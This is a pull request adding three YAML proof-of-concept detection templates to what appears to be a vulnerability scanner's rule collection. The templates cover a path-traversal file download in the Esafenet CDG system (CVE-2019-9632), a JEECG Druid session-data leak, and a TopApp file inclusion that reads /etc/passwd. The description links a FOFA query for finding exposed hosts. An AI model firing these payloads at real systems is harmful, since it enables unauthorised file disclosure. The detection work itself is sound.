### PR TITLE
Create cdg-cve-2019-9632.yml

### DIFF
--- a/pocs/CDG-cve-2019-9632.yml
+++ b/pocs/CDG-cve-2019-9632.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-CDG-cve-2019-9632
+rules:
+  - method: POST
+    path: /CDGServer3/ClientAjax
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36"
+    body: |
+      command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<servlet-name>CDGPermissions</servlet-name>")
+detail:
+  author: liberty
+  links:
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9632exploit-db

--- a/pocs/cdg-cve-2019-9632.yml
+++ b/pocs/cdg-cve-2019-9632.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-CDG-cve-2019-9632
+name: poc-yaml-cdg-cve-2019-9632
 rules:
   - method: POST
     path: /CDGServer3/ClientAjax

--- a/pocs/jeecg-info-leak.yml
+++ b/pocs/jeecg-info-leak.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-jeecg-info-leak
+rules:
+  - method: GET
+    path: /webpage/system/druid/websession.json
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"ResultCode") && response.body.bcontains(b"SESSIONID") && response.body.bcontains(b"ConcurrentMax") && response.body.bcontains(b"RequestTimeMillisTotal")
+detail:
+  author: liberty
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/88672752
+    - https://xz.aliyun.com/t/4405

--- a/pocs/topapp-lb-fileinclude.yml
+++ b/pocs/topapp-lb-fileinclude.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-topapp-lb-fileinclude
+rules:
+  - method: GET
+    path: /change_lan.php?LanID=../../../../../../../../../etc/passwd%00
+    follow_redirects: true
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.body.bcontains(b"PRODUCT_NAME_STRING")
+detail:
+  author: liberty
+  links:
+    - http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2015-0118464


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
亿赛通电子文档安全管理系统任意文件下载漏洞
## 测试环境
https://classic.fofa.so/result?qbase64=Q0RHU2VydmVyMw%3D%3D
## 备注
detail:
  author: liberty
  links:
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9632exploit-db
![截图20200912](https://user-images.githubusercontent.com/18664862/93669156-7fa0cc80-fac4-11ea-926a-57a1eef4d7c0.png)
